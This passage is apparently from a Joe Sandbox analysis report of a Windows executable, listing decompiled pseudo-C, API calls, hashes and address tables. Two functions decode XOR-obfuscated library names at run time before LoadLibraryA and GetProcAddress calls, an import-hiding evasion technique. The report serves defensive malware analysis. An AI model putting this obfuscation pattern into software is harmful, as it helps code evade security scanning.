                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: '$8$H$J$K$L$Q$V$^$y
                                                                    • API String ID: 2574300362-2015752909
                                                                    • Opcode ID: 07eae468bfb3f3be1d59a2d399bf422476f3f657f132c18713f802f5554b2beb
                                                                    • Instruction ID: 3d344977766e9e3632f439ecadd653b0d9af4f9dc5cd0bf782aa0cdbf1fa7b1d
                                                                    • Opcode Fuzzy Hash: 07eae468bfb3f3be1d59a2d399bf422476f3f657f132c18713f802f5554b2beb
                                                                    • Instruction Fuzzy Hash: 0121196410C7C09DE306D729D94875BBED15B62308F88C8ADE5DD8A292D7BE8849C72B
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0041C580(CHAR* _a4) {
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				char _v12;
                                                                    				char _v13;
                                                                    				char _v14;
                                                                    				char _v15;
                                                                    				char _v16;
                                                                    				signed int _v20;
                                                                    				signed char _v21;
                                                                    				signed int _t37;
                                                                    				signed int _t39;
                                                                    				signed char _t41;
                                                                    				intOrPtr _t45;
                                                                    				void* _t49;
                                                                    				intOrPtr _t56;
                                                                    				signed char _t60;
                                                                    				signed char _t61;
                                                                    				signed int _t63;
                                                                    				signed char _t64;
                                                                    				struct HINSTANCE__* _t67;
                                                                    				signed char _t71;
                                                                    				void* _t75;
                                                                    				_Unknown_base(*)()* _t76;
                                                                    				void* _t77;
                                                                    
                                                                    				_t63 =  *0x447d6c; // 0x0
                                                                    				_t37 = _t63;
                                                                    				_v20 = _t37 * 0x5a >> 0x20;
                                                                    				_v21 = _t37 * 0x5a;
                                                                    				_t39 = _v20;
                                                                    				_t71 = _t39 * 0x67 >> 0x20;
                                                                    				_t64 = _t63 - _t39 * 0x67;
                                                                    				_t41 = _v21;
                                                                    				_t75 = 0x27;
                                                                    				do {
                                                                    					_t71 = _t71 - _t41;
                                                                    					_t75 = _t75 - 1;
                                                                    				} while (_t75 != 0);
                                                                    				_t60 = _t64 ^ _t71 | 0x0000004f;
                                                                    				_t67 =  *0x447d84; // 0x76b10000
                                                                    				if(_t67 != 0) {
                                                                    					L8:
                                                                    					_t76 = GetProcAddress(_t67, _a4);
                                                                    					if(_t76 == 0) {
                                                                    						_t45 =  *0x447d7c; // 0x1
                                                                    						if(_t45 != 0) {
                                                                    							E0041A720(1);
                                                                    						}
                                                                    					}
                                                                    					return _t76;
                                                                    				} else {
                                                                    					_v15 = 0x25;
                                                                    					_v7 = 0x25;
                                                                    					_v6 = 0x2d;
                                                                    					_v5 = 0x2d;
                                                                    					_v16 = 0x20;
                                                                    					_v14 = 0x37;
                                                                    					_v13 = 0x20;
                                                                    					_v12 = 0x31;
                                                                    					_v11 = 0x28;
                                                                    					_v10 = 0x72;
                                                                    					_v9 = 0x73;
                                                                    					_v8 = 0x6f;
                                                                    					_v4 = 0x41;
                                                                    					_t49 = 0;
                                                                    					goto L4;
                                                                    					L4:
                                                                    					 *(_t77 + _t49 + 0x10) =  *(_t77 + _t49 + 0x10) ^ 0x00000041;
                                                                    					_t49 = _t49 + 1;
                                                                    					if(_t49 < 0xd) {
                                                                    						goto L4;
                                                                    					} else {
                                                                    						_t67 = LoadLibraryA( &_v16);
                                                                    						_t61 = _t60 + (_t60 - 0x00000027 ^ 0x000000e9) * 0x2c;
                                                                    						 *0x447d84 = _t67;
                                                                    						if(_t67 == 0) {
                                                                    							_t56 =  *0x447d7c; // 0x1
                                                                    							_v21 = _t61 << 6;
                                                                    							if(_t56 != 0) {
                                                                    								E0041A720(1);
                                                                    								_t67 =  *0x447d84; // 0x76b10000
                                                                    							}
                                                                    						}
                                                                    						goto L8;
                                                                    					}
                                                                    				}
                                                                    			}

































                                                                    0x0041c583
                                                                    0x0041c590
                                                                    0x0041c59b
                                                                    0x0041c59f
                                                                    0x0041c5a3
                                                                    0x0041c5a9
                                                                    0x0041c5ab
                                                                    0x0041c5ad
                                                                    0x0041c5b1
                                                                    0x0041c5b6
                                                                    0x0041c5b6
                                                                    0x0041c5b8
                                                                    0x0041c5b8
                                                                    0x0041c5c0
                                                                    0x0041c5c2
                                                                    0x0041c5ca
                                                                    0x0041c65f
                                                                    0x0041c66b
                                                                    0x0041c66f
                                                                    0x0041c671
                                                                    0x0041c678
                                                                    0x0041c67c
                                                                    0x0041c67c
                                                                    0x0041c678
                                                                    0x0041c688
                                                                    0x0041c5d0
                                                                    0x0041c5d2
                                                                    0x0041c5d6
                                                                    0x0041c5de
                                                                    0x0041c5e2
                                                                    0x0041c5e6
                                                                    0x0041c5ea
                                                                    0x0041c5ef
                                                                    0x0041c5f3
                                                                    0x0041c5f8
                                                                    0x0041c5fd
                                                                    0x0041c602
                                                                    0x0041c607
                                                                    0x0041c60c
                                                                    0x0041c611
                                                                    0x0041c611
                                                                    0x0041c613
                                                                    0x0041c613
                                                                    0x0041c618
                                                                    0x0041c61c
                                                                    0x00000000
                                                                    0x0041c61e
                                                                    0x0041c629
                                                                    0x0041c636
                                                                    0x0041c63a
                                                                    0x0041c640
                                                                    0x0041c642
                                                                    0x0041c64c
                                                                    0x0041c650
                                                                    0x0041c654
                                                                    0x0041c659
                                                                    0x0041c659
                                                                    0x0041c650
                                                                    0x00000000
                                                                    0x0041c640
                                                                    0x0041c61c

                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(00000041), ref: 0041C623
                                                                    • GetProcAddress.KERNEL32(76B10000,?), ref: 0041C665
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: ($1$7$A$A$o$r$s
                                                                    • API String ID: 2574300362-1398786251
                                                                    • Opcode ID: 1bd7b995730252d2abdc7e9f40050a13eb4ec7b8990fffbe5426ee7a2b0170cf
                                                                    • Instruction ID: 9168922cf028962762e7c3630e87cec27554926b78189a3a967d1e55294b1143
                                                                    • Opcode Fuzzy Hash: 1bd7b995730252d2abdc7e9f40050a13eb4ec7b8990fffbe5426ee7a2b0170cf
                                                                    • Instruction Fuzzy Hash: FC31A12554D3818ED306DF38A8906EBBFE55B66344F04689EE4D487353C268C68DC7E7
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 75%
                                                                    			E0042933F(void* __ebx, void* __edi, int __esi, void* __eflags) {
                                                                    				signed int _t119;
                                                                    				intOrPtr _t120;
                                                                    				int _t122;
                                                                    				char* _t125;
                                                                    				int _t132;
                                                                    				signed int _t134;
                                                                    				int _t137;
                                                                    				int _t138;
                                                                    				short* _t160;
                                                                    				short* _t163;
                                                                    				int _t164;
                                                                    				signed int _t165;
                                                                    				long _t169;
                                                                    				signed int _t172;
                                                                    				int _t181;
                                                                    				char* _t183;
                                                                    				int _t184;
                                                                    				signed int _t186;
                                                                    				int _t187;
                                                                    				int _t190;
                                                                    				void* _t192;
                                                                    				short* _t193;
                                                                    				char* _t195;
                                                                    				char* _t196;
                                                                    				signed int _t199;
                                                                    
                                                                    				_t185 = __esi;
                                                                    				_push(0x38);
                                                                    				_push(0x4312f0);
                                                                    				E0042422C(__ebx, __edi, __esi);
                                                                    				_t199 =  *0x4484b4; // 0x1
                                                                    				if(_t199 == 0) {
                                                                    					_t185 = 1;
                                                                    					if(LCMapStringW(0, 0x100, 0x430bb4, 1, 0, 0) == 0) {
                                                                    						_t169 = GetLastError();
                                                                    						__eflags = _t169 - 0x78;
                                                                    						if(_t169 == 0x78) {
                                                                    							 *0x4484b4 = 2;
                                                                    						}
                                                                    					} else {
                                                                    						 *0x4484b4 = 1;
                                                                    					}
                                                                    				}
                                                                    				if( *(_t192 + 0x14) <= 0) {
                                                                    					L11:
                                                                    					_t119 =  *0x4484b4; // 0x1
                                                                    					if(_t119 == 2 || _t119 == 0) {
                                                                    						 *(_t192 - 0x28) = 0;
                                                                    						_t183 = 0;
                                                                    						 *(_t192 - 0x3c) = 0;
                                                                    						__eflags =  *(_t192 + 8);
                                                                    						if( *(_t192 + 8) == 0) {
                                                                    							_t138 =  *0x448460; // 0x0
                                                                    							 *(_t192 + 8) = _t138;
                                                                    						}
                                                                    						__eflags =  *(_t192 + 0x20);
                                                                    						if( *(_t192 + 0x20) == 0) {
                                                                    							_t137 =  *0x448470; // 0x0
                                                                    							 *(_t192 + 0x20) = _t137;
                                                                    						}
                                                                    						_t120 = E004298A2( *(_t192 + 8));
                                                                    						 *((intOrPtr*)(_t192 - 0x40)) = _t120;
                                                                    						__eflags = _t120 - 0xffffffff;
                                                                    						if(_t120 != 0xffffffff) {
                                                                    							__eflags = _t120 -  *(_t192 + 0x20);
                                                                    							if(__eflags == 0) {
                                                                    								_t186 = LCMapStringA( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 + 0x10),  *(_t192 + 0x14),  *(_t192 + 0x18),  *(_t192 + 0x1c));
                                                                    								L61:
                                                                    								__eflags =  *(_t192 - 0x28);
                                                                    								if(__eflags != 0) {
                                                                    									_push( *(_t192 - 0x28));
                                                                    									E0042275E(0, _t183, _t186, __eflags);
                                                                    								}
                                                                    								_t122 = _t186;
                                                                    								goto L64;
                                                                    							}
                                                                    							_push(0);
                                                                    							_push(0);
                                                                    							_t175 = _t192 + 0x14;
                                                                    							_push(_t192 + 0x14);
                                                                    							_push( *(_t192 + 0x10));
                                                                    							_push(_t120);
                                                                    							_push( *(_t192 + 0x20));
                                                                    							_t125 = E004298E5(0, _t183, _t185, __eflags);
                                                                    							_t195 =  &(_t193[0xc]);
                                                                    							 *(_t192 - 0x28) = _t125;
                                                                    							__eflags = _t125;
                                                                    							if(_t125 == 0) {
                                                                    								goto L46;
                                                                    							}
                                                                    							_t187 = LCMapStringA( *(_t192 + 8),  *(_t192 + 0xc), _t125,  *(_t192 + 0x14), 0, 0);
                                                                    							 *(_t192 - 0x24) = _t187;
                                                                    							__eflags = _t187;
                                                                    							if(_t187 == 0) {
                                                                    								_t186 =  *(_t192 - 0x48);
                                                                    								L58:
                                                                    								__eflags =  *(_t192 - 0x3c);
                                                                    								if(__eflags != 0) {
                                                                    									_push(_t183);
                                                                    									E0042275E(0, _t183, _t186, __eflags);
                                                                    								}
                                                                    								goto L61;
                                                                    							}
                                                                    							 *(_t192 - 4) = 0;
                                                                    							E00422920(_t126 + 0x00000003 & 0xfffffffc, _t175);
                                                                    							 *(_t192 - 0x18) = _t195;
                                                                    							_t183 = _t195;
                                                                    							 *(_t192 - 0x44) = _t183;
                                                                    							E004282F0(_t183, 0, _t187);
                                                                    							_t196 =  &(_t195[0xc]);
                                                                    							 *(_t192 - 4) =  *(_t192 - 4) | 0xffffffff;
                                                                    							__eflags = _t183;
                                                                    							if(_t183 != 0) {
                                                                    								L54:
                                                                    								_t132 = LCMapStringA( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 - 0x28),  *(_t192 + 0x14), _t183,  *(_t192 - 0x24));
                                                                    								 *(_t192 - 0x24) = _t132;
                                                                    								__eflags = _t132;
                                                                    								if(__eflags != 0) {
                                                                    									_push( *(_t192 + 0x1c));
                                                                    									_push( *(_t192 + 0x18));
                                                                    									_push(_t192 - 0x24);
                                                                    									_push(_t183);
                                                                    									_push( *(_t192 + 0x20));
                                                                    									_push( *((intOrPtr*)(_t192 - 0x40)));
                                                                    									_t134 = E004298E5(0, _t183, _t187, __eflags);
                                                                    									asm("sbb esi, esi");
                                                                    									_t186 =  ~( ~_t134);
                                                                    									goto L58;
                                                                    								}
                                                                    								goto L55;
                                                                    							} else {
                                                                    								_t183 = E00422EEB( *(_t192 - 0x24));
                                                                    								__eflags = _t183;
                                                                    								if(_t183 == 0) {
                                                                    									L55:
                                                                    									_t186 = 0;
                                                                    									goto L58;
                                                                    								}
                                                                    								E004282F0(_t183, 0,  *(_t192 - 0x24));
                                                                    								_t196 =  &(_t196[0xc]);
                                                                    								 *(_t192 - 0x3c) = 1;
                                                                    								goto L54;
                                                                    							}
                                                                    						} else {
                                                                    							goto L46;
                                                                    						}
                                                                    					} else {
                                                                    						if(_t119 != 1) {
                                                                    							L46:
                                                                    							_t122 = 0;
                                                                    							L64:
                                                                    							return E00424267(_t122);
                                                                    						}
                                                                    						_t184 = 0;
                                                                    						 *(_t192 - 0x2c) = 0;
                                                                    						 *(_t192 - 0x38) = 0;
                                                                    						 *(_t192 - 0x34) = 0;
                                                                    						if( *(_t192 + 0x20) == 0) {
                                                                    							_t164 =  *0x448470; // 0x0
                                                                    							 *(_t192 + 0x20) = _t164;
                                                                    						}
                                                                    						_t190 = MultiByteToWideChar( *(_t192 + 0x20), 1 + (0 |  *((intOrPtr*)(_t192 + 0x24)) != 0x00000000) * 8,  *(_t192 + 0x10),  *(_t192 + 0x14), 0, 0);
                                                                    						 *(_t192 - 0x30) = _t190;
                                                                    						if(_t190 == 0) {
                                                                    							goto L46;
                                                                    						} else {
                                                                    							 *(_t192 - 4) = 1;
                                                                    							E00422920(_t190 + _t190 + 0x00000003 & 0xfffffffc, _t172);
                                                                    							 *(_t192 - 0x18) = _t193;
                                                                    							 *(_t192 - 0x1c) = _t193;
                                                                    							 *(_t192 - 4) =  *(_t192 - 4) | 0xffffffff;
                                                                    							if( *(_t192 - 0x1c) != 0) {
                                                                    								L21:
                                                                    								if(MultiByteToWideChar( *(_t192 + 0x20), 1,  *(_t192 + 0x10),  *(_t192 + 0x14),  *(_t192 - 0x1c), _t190) == 0) {
                                                                    									L36:
                                                                    									_t219 =  *(_t192 - 0x34);
                                                                    									if( *(_t192 - 0x34) != 0) {
                                                                    										_push( *(_t192 - 0x20));
                                                                    										E0042275E(0, _t184, _t190, _t219);
                                                                    									}
                                                                    									_t220 =  *(_t192 - 0x38);
                                                                    									if( *(_t192 - 0x38) != 0) {
                                                                    										_push( *(_t192 - 0x1c));
                                                                    										E0042275E(0, _t184, _t190, _t220);
                                                                    									}
                                                                    									_t122 = _t184;
                                                                    									goto L64;
                                                                    								}
                                                                    								_t184 = LCMapStringW( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 - 0x1c), _t190, 0, 0);
                                                                    								 *(_t192 - 0x2c) = _t184;
                                                                    								if(_t184 == 0) {
                                                                    									goto L36;
                                                                    								}
                                                                    								if(( *(_t192 + 0xd) & 0x00000004) == 0) {
                                                                    									 *(_t192 - 4) = 2;
                                                                    									E00422920(_t184 + _t184 + 0x00000003 & 0xfffffffc, _t172);
                                                                    									 *(_t192 - 0x18) = _t193;
                                                                    									 *(_t192 - 0x20) = _t193;
                                                                    									 *(_t192 - 4) =  *(_t192 - 4) | 0xffffffff;
                                                                    									__eflags =  *(_t192 - 0x20);
                                                                    									if( *(_t192 - 0x20) != 0) {
                                                                    										L31:
                                                                    										__eflags = LCMapStringW( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 - 0x1c), _t190,  *(_t192 - 0x20), _t184);
                                                                    										if(__eflags != 0) {
                                                                    											_push(0);
                                                                    											_push(0);
                                                                    											__eflags =  *(_t192 + 0x1c);
                                                                    											if(__eflags != 0) {
                                                                    												_push( *(_t192 + 0x1c));
                                                                    												_push( *(_t192 + 0x18));
                                                                    											} else {
                                                                    												_push(0);
                                                                    												_push(0);
                                                                    											}
                                                                    											_t184 = WideCharToMultiByte( *(_t192 + 0x20), 0,  *(_t192 - 0x20), _t184, ??, ??, ??, ??);
                                                                    										}
                                                                    										goto L36;
                                                                    									} else {
                                                                    										_t160 = E00422EEB(_t184 + _t184);
                                                                    										 *(_t192 - 0x20) = _t160;
                                                                    										__eflags = _t160;
                                                                    										if(__eflags == 0) {
                                                                    											goto L36;
                                                                    										}
                                                                    										 *(_t192 - 0x34) = 1;
                                                                    										goto L31;
                                                                    									}
                                                                    								}
                                                                    								if( *(_t192 + 0x1c) != 0 && _t184 <=  *(_t192 + 0x1c)) {
                                                                    									LCMapStringW( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 - 0x1c), _t190,  *(_t192 + 0x18),  *(_t192 + 0x1c));
                                                                    								}
                                                                    								goto L36;
                                                                    							} else {
                                                                    								_t163 = E00422EEB(_t190 + _t190);
                                                                    								_pop(_t172);
                                                                    								 *(_t192 - 0x1c) = _t163;
                                                                    								if(_t163 == 0) {
                                                                    									goto L46;
                                                                    								}
                                                                    								 *(_t192 - 0x38) = 1;
                                                                    								goto L21;
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    				}
                                                                    				_t181 =  *(_t192 + 0x14);
                                                                    				_t165 =  *(_t192 + 0x10);
                                                                    				while(1) {
                                                                    					_t172 = _t181 - 1;
                                                                    					if( *_t165 == 0) {
                                                                    						break;
                                                                    					}
                                                                    					_t165 = _t165 + 1;
                                                                    					if(_t172 != 0) {
                                                                    						continue;
                                                                    					}
                                                                    					_t172 = _t172 | 0xffffffff;
                                                                    					break;
                                                                    				}
                                                                    				 *(_t192 + 0x14) =  *(_t192 + 0x14) + (_t165 | 0xffffffff) - _t172;
                                                                    				goto L11;
                                                                    			}




























                                                                    0x0042933f
                                                                    0x0042933f
                                                                    0x00429341
                                                                    0x00429346
                                                                    0x0042934d
                                                                    0x00429353
                                                                    0x00429359
                                                                    0x0042936e
                                                                    0x00429378
                                                                    0x0042937e
                                                                    0x00429381
                                                                    0x00429383
                                                                    0x00429383
                                                                    0x00429370
                                                                    0x00429370
                                                                    0x00429370
                                                                    0x0042936e
                                                                    0x00429390
                                                                    0x004293ad
                                                                    0x004293ad
                                                                    0x004293b5
                                                                    0x00429597
                                                                    0x0042959a
                                                                    0x0042959c
                                                                    0x0042959f
                                                                    0x004295a2
                                                                    0x004295a4
                                                                    0x004295a9
                                                                    0x004295a9
                                                                    0x004295ac
                                                                    0x004295af
                                                                    0x004295b1
                                                                    0x004295b6
                                                                    0x004295b6
                                                                    0x004295bc
                                                                    0x004295c2
                                                                    0x004295c5
                                                                    0x004295c8
                                                                    0x004295d1
                                                                    0x004295d4
                                                                    0x004296e0
                                                                    0x004296e2
                                                                    0x004296e2
                                                                    0x004296e5
                                                                    0x004296e7
                                                                    0x004296ea
                                                                    0x004296ef
                                                                    0x004296f0
                                                                    0x00000000
                                                                    0x004296f0
                                                                    0x004295da
                                                                    0x004295db
                                                                    0x004295dc
                                                                    0x004295df
                                                                    0x004295e0
                                                                    0x004295e3
                                                                    0x004295e4
                                                                    0x004295e7
                                                                    0x004295ec
                                                                    0x004295ef
                                                                    0x004295f2
                                                                    0x004295f4
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00429608
                                                                    0x0042960a
                                                                    0x0042960d
                                                                    0x0042960f
                                                                    0x004296b7
                                                                    0x004296ba
                                                                    0x004296ba
                                                                    0x004296bd
                                                                    0x004296bf
                                                                    0x004296c0
                                                                    0x004296c5
                                                                    0x00000000
                                                                    0x004296bd
                                                                    0x00429615
                                                                    0x0042961e
                                                                    0x00429623
                                                                    0x00429626
                                                                    0x00429628
                                                                    0x0042962e
                                                                    0x00429633
                                                                    0x00429648
                                                                    0x0042964c
                                                                    0x0042964e
                                                                    0x00429673
                                                                    0x00429683
                                                                    0x00429689
                                                                    0x0042968c
                                                                    0x0042968e
                                                                    0x00429694
                                                                    0x00429697
                                                                    0x0042969d
                                                                    0x0042969e
                                                                    0x0042969f
                                                                    0x004296a2
                                                                    0x004296a5
                                                                    0x004296b1
                                                                    0x004296b3
                                                                    0x00000000
                                                                    0x004296b3
                                                                    0x00000000
                                                                    0x00429650
                                                                    0x00429659
                                                                    0x0042965b
                                                                    0x0042965d
                                                                    0x00429690
                                                                    0x00429690
                                                                    0x00000000
                                                                    0x00429690
                                                                    0x00429664
                                                                    0x00429669
                                                                    0x0042966c
                                                                    0x00000000
                                                                    0x0042966c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004293c3
                                                                    0x004293c6
                                                                    0x004295ca
                                                                    0x004295ca
                                                                    0x004296f2
                                                                    0x004296fa
                                                                    0x004296fa
                                                                    0x004293cc
                                                                    0x004293ce
                                                                    0x004293d1
                                                                    0x004293d4
                                                                    0x004293da
                                                                    0x004293dc
                                                                    0x004293e1
                                                                    0x004293e1
                                                                    0x00429405
                                                                    0x00429407
                                                                    0x0042940c
                                                                    0x00000000
                                                                    0x00429412
                                                                    0x00429412
                                                                    0x00429422
                                                                    0x00429427
                                                                    0x0042942c
                                                                    0x0042942f
                                                                    0x00429453
                                                                    0x00429471
                                                                    0x00429488
                                                                    0x00429574
                                                                    0x00429574
                                                                    0x00429577
                                                                    0x00429579
                                                                    0x0042957c
                                                                    0x00429581
                                                                    0x00429582
                                                                    0x00429585
                                                                    0x00429587
                                                                    0x0042958a
                                                                    0x0042958f
                                                                    0x00429590
                                                                    0x00000000
                                                                    0x00429590
                                                                    0x004294a0
                                                                    0x004294a2
                                                                    0x004294a7
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004294b1
                                                                    0x004294e0
                                                                    0x004294f0
                                                                    0x004294f5
                                                                    0x004294fa
                                                                    0x004294fd
                                                                    0x0042951e
                                                                    0x00429521
                                                                    0x0042953b
                                                                    0x0042954f
                                                                    0x00429551
                                                                    0x00429553
                                                                    0x00429554
                                                                    0x00429555
                                                                    0x00429558
                                                                    0x0042955e
                                                                    0x00429561
                                                                    0x0042955a
                                                                    0x0042955a
                                                                    0x0042955b
                                                                    0x0042955b
                                                                    0x00429572
                                                                    0x00429572
                                                                    0x00000000
                                                                    0x00429523
                                                                    0x00429527
                                                                    0x0042952d
                                                                    0x00429530
                                                                    0x00429532
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00429534
                                                                    0x00000000
                                                                    0x00429534
                                                                    0x00429521
                                                                    0x004294b6
                                                                    0x004294d5
                                                                    0x004294d5
                                                                    0x00000000
                                                                    0x00429455
                                                                    0x00429459
                                                                    0x0042945e
                                                                    0x0042945f
                                                                    0x00429464
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0042946a
                                                                    0x00000000
                                                                    0x0042946a
                                                                    0x00429453
                                                                    0x0042940c
                                                                    0x004293b5
                                                                    0x00429392
                                                                    0x00429395
                                                                    0x00429398
                                                                    0x00429398
                                                                    0x0042939b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0042939d
                                                                    0x004293a0
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004293a2
                                                                    0x00000000
                                                                    0x004293a2
                                                                    0x004293aa
                                                                    0x00000000

                                                                    APIs
                                                                    • LCMapStringW.KERNEL32(00000000,00000100,00430BB4,00000001,00000000,00000000,004312F0,00000038,0042764F,00000100,00000020,00000100,?,00000100,00000000,00000001), ref: 00429366
                                                                    • GetLastError.KERNEL32 ref: 00429378
                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,0042788D,?,00000000,00000000,004312F0,00000038,0042764F,00000100,00000020,00000100,?,00000100,00000000,00000001), ref: 004293FF
                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,0042788D,?,?,00000000), ref: 00429480
                                                                    • LCMapStringW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 0042949A
                                                                    • LCMapStringW.KERNEL32(00000000,00000000,?,00000000,?,?), ref: 004294D5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: String$ByteCharMultiWide$ErrorLast
                                                                    • String ID:
                                                                    • API String ID: 1775797328-0
                                                                    • Opcode ID: 744fb72c5ef86bd1ddb677c90b3709c0c659fc370de5e66f03370d0988efad70
                                                                    • Instruction ID: b9568866b9305004aba30022c6f045a69541abf634a3c6620ae29432a45a26aa
                                                                    • Opcode Fuzzy Hash: 744fb72c5ef86bd1ddb677c90b3709c0c659fc370de5e66f03370d0988efad70
                                                                    • Instruction Fuzzy Hash: 1EB18E72A0012AFFCF119FA0EC849EE7BB5FF08354F50422AF915A2260D7398D91DB58
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0041DA50(CHAR* _a4) {
                                                                    				char _v2;
                                                                    				char _v3;
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				char _v12;
                                                                    				signed int _v16;
                                                                    				struct HINSTANCE__* _t23;
                                                                    				intOrPtr _t26;
                                                                    				void* _t30;
                                                                    				signed int _t34;
                                                                    				intOrPtr _t35;
                                                                    				signed int _t36;
                                                                    				signed int _t37;
                                                                    				signed short _t38;
                                                                    				_Unknown_base(*)()* _t39;
                                                                    				void* _t40;
                                                                    				signed int* _t42;
                                                                    
                                                                    				_t42 =  &_v16;
                                                                    				_t37 = _v16;
                                                                    				if(_t37 >= 0x76) {
                                                                    					_t38 = _t37 & 0x00000021;
                                                                    				} else {
                                                                    					_t38 = _t37 + _t37 * 8 << 3;
                                                                    				}
                                                                    				_t23 =  *0x447fb0; // 0x0
                                                                    				if(_t23 != 0) {
                                                                    					L11:
                                                                    					_t39 = GetProcAddress(_t23, _a4);
                                                                    					if(_t39 == 0) {
                                                                    						_t26 =  *0x447d7c; // 0x1
                                                                    						if(_t26 != 0) {
                                                                    							E0041A720(1);
                                                                    						}
                                                                    					}
                                                                    					return _t39;
                                                                    				} else {
                                                                    					_v10 = 0x6f;
                                                                    					_v7 = 0x6f;
                                                                    					_v4 = 0x31;
                                                                    					_v3 = 0x31;
                                                                    					_v12 = 0x2a;
                                                                    					_v11 = 0x2e;
                                                                    					_v9 = 2;
                                                                    					_v8 = 0x6e;
                                                                    					_v6 = 0x73;
                                                                    					_v5 = 0x39;
                                                                    					_v2 = 0x5d;
                                                                    					_t30 = 0;
                                                                    					do {
                                                                    						 *(_t42 + _t30 + 8) =  *(_t42 + _t30 + 8) ^ 0x0000005d;
                                                                    						_t30 = _t30 + 1;
                                                                    					} while (_t30 < 0xb);
                                                                    					_t23 = LoadLibraryA( &_v12);
                                                                    					 *0x447fb0 = _t23;
                                                                    					if(_t23 != 0) {
                                                                    						goto L11;
                                                                    					}
                                                                    					_t36 = _t38 & 0x0000ffff;
                                                                    					_t34 = _t36;
                                                                    					_t40 = 0x58;
                                                                    					do {
                                                                    						_t40 = _t40 - 1;
                                                                    						_t34 = _t34 + _t36 - 0x2f;
                                                                    					} while (_t40 != 0);
                                                                    					_t35 =  *0x447d7c; // 0x1
                                                                    					if(_t35 != 0) {
                                                                    						E0041A720(1);
                                                                    						_t23 =  *0x447fb0; // 0x0
                                                                    					}
                                                                    					goto L11;
                                                                    				}
                                                                    			}


























                                                                    0x0041da50
                                                                    0x0041da54
                                                                    0x0041da5c
                                                                    0x0041da66
                                                                    0x0041da5e
                                                                    0x0041da61
                                                                    0x0041da61
                                                                    0x0041da69
                                                                    0x0041da70
                                                                    0x0041dafd
                                                                    0x0041db09
                                                                    0x0041db0d
                                                                    0x0041db0f
